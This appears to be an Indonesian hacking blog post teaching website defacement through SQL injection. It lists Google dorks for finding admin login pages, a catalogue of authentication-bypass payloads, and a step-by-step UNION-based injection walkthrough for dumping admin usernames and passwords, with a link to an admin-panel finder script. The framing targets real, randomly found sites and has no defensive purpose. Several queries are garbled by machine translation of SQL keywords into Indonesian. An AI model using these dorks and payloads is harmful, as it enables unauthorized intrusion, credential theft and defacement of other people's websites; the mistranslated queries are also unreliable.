O‍NOFILE

Dasar- dasar Deface Dengan SQl Injection Terbaru

KUNJUNGI WEBSITE BARU KAMI DENGAN KUALITAS YANG LEBIH BAIK DI SINI
Mari kita belajar SQL INJECTION apa itu sql injection .. ? Sebuah sql query yg di suntik ke dalam database lain atau menggunakan query untuk mendapatkan bypass auth sebagai admin.


Inilah Dasar-Dasar SQL INJECTION :


 1 Dasar sql injec
Mendapatkan auth bypass di account admin. Kebanyakan situs rentan terhadap ini.
- Pertama kita perlu menemukan situs
- mulailah dengan membuka google.

- Sekarang kita ketik dork ..
"defenition of dork" .. ?entri pencarian untuk jenis tertentu dari situs / mengeksploitasi. dLL "
Ada sejumlah besar dork google untuk injeksi sql dasar.

"Inurl: admin.asp"
"Inurl: login / admin.asp"
"Inurl: admin / login.asp"
"Inurl: adminlogin.asp"
"Inurl: adminhome.asp"
"Inurl: admin_login.asp"
"Inurl: administratorlogin.asp"
"Inurl: login / administrator.asp"
"Inurl: administrator_login.asp"

- Sekarang apa yang harus dilakukan setelah kita sampai di situs itu ??

situs harus terlihat seperti ini:

selamat datang di panel administrator xxxxxxxxxx (misalnya)
username:
password:

sehingga apa yang kita lakukan di sini ?
ketik username dengan "Admin"
dan untuk password a jenis sql injection kita

ini adalah daftar sql injection


' or '1'='1
' or 'x'='x
' or 0=0 --

" or 0=0 --

or 0=0 --

' or 0=0 #

" or 0=0 #

or 0=0 #

' or 'x'='x

" or "x"="x

') or ('x'='x

' or 1=1--

" or 1=1--

or 1=1--

' or a=a--

" or "a"="a

') or ('a'='a

") or ("a"="a

hi" or "a"="a

hi" or 1=1 --

hi' or 1=1 --
'or'1=1'

dan masih bnyak lagi.
ini membingungkan dari database sampai memberikan bypass auth.

Jadi yang Anda masukkan akan terlihat seperti ini

username: Admin
password: 'or'1' = '1

Jadi klik submit and you'r in

CATATAN >> tidak semua situs yang lemah.


2: injeksi query sql untuk mengekstrak username dan password admin


ada daftar 4 situs dork link kyk ini

"Inurl: index.php? Catid ="
"Inurl: news.php? Catid ="
"Inurl: index.php? Id ="
"Inurl: news.php? Id ="
atau yang terbaik dalam pandangan saya >> kredit "punya teman "netheroes" untuk menemukan ini"
"Inurl:" php?. Catid = "site: xxx"






http://www.xxxx.com/index.php?catid=1'

sekarang kita perlu menemukan jumlah kolom dalam database sql ..
jadi jenis kita di sini >>
http://www.xxxx.com/index.php?catid=1 order by 1-- "no error"
http://www.xxxx.com/index.php?catid=1 order by 2-- "no error"
http://www.xxxx.com/index.php?catid=1 order by 3-- "no error"
http://www.xxxx.com/index.php?catid=1 order by 4-- "no error"
http://www.xxxx.com/index.php?catid=1 order by 5-- "error"

sehingga database ini memiliki 4 kolom karena kita punya kesalahan yg ke 5 ..
pada beberapa database ada 2 kolom dan pada sekitar 200 itu bervariasi
begitu kita memiliki column number ..

kita mencoba fungsi ini >>
http://www.xxxx.com/index.php?catid=1 serikat pilih 1,2,3,4 - "atau apa pun jumlah kolom dalam database"
jika Anda melihat beberapa nomor seperti 1 2 3 4 pada layar atau nama kolom
itu mungkin tidak menampilkan semua nomor pada layar namun jumlah yang ditampilkan adalah yang dapat kita ganti untuk mengekstrak info dari DB
'jadi sekarang kita perlu info tentang DB'

jadi umpamakan angka 2 dan 4 muncul di layar
jadi kita akan menggunakan pada 2 permintaan
http://www.xxxx.com/index.php?catid=1 serikat 1 pilih, CONCAT_WS (CHAR (32,58,32), user (), database (), versi ()) ,3,4 -
jenis dan versi db akan muncul di layar
jika versi db adalah 4 atau lebih rendah maka untuk mengekstrak password Anda akan memerlukan permintaan ini
http://www.xxxx.com/index.php?catid=-1 UNION SELECT 1, penggabungan strings (table_name, CHAR (58), column_name, CHAR (58), table_schema) of information_schema.columns mana column_name seperti CHAR (37 , 112, 97, 115, 37 ,3,4) -
ini harus menampilkan tabel yang berisi username dan password admin
tapi jika tidak maka Anda perlu menebak table
lalu ketik
http://www.xxxx.com/index.php?catid=1 UNION SELECT 1, password, 3,4 admintablename DARI -
yang mengatakan jenis admintablename temukan table Anda dengan penggabungan strings (table_name, CHAR (58), column_name, CHAR (58), table_schema) dan information_schema.columns mana column_name seperti CHAR (37, 112, 97, 115, 37) - atau Anda menebak
kemudian kitaharus memiliki nama tabel yang tepat dan mendapatkan password administrator
kemudian hanya melakukan hal yang sama tetapi bukan tipe username password
kadang-kadang untuk password hash agan perlu untuk memecahkannya.
kemudian lihat apakah Anda dapat mendapatkan panel admin jika Anda cant kemudian mencoba skrip admin panel finder sinihttp://www.darkc0de.com/c0de/perl/admin_1.2_.txt
sekarang jika database yang versi 5 atau hingga
jenis
http://www.xxxx.com/index.php?catid=-1 UNION SELECT 1, table_name, 3,4 DARI information_schema.tables--
dan yang akan menampilkan daftar semua tabel
setelah Anda memiliki nama tabel
ketik seperti yg 4 berikut ini ..
http://www.xxxx.com/index.php?catid=1 UNION SELECT 1, password, 3,4 DARI admintable -
maka sama dengan nama pengguna

tapi sekarang jika doesnt bekerja di semua hal
hanya tool - tool sekitar dengan semua sedikit catid = 1 atau catid =- 1

tapi kadang-kadang kita juga perlu untuk menggunakan versi () atau versi @ @
sehingga kadang-kadang versi UNION SELECT (), password, 3,4 DARI admintable -
atau versi UNION SELECT @ @, password, 3,4 DARI admintable -
klo butuh dork google yg banyak ada di sini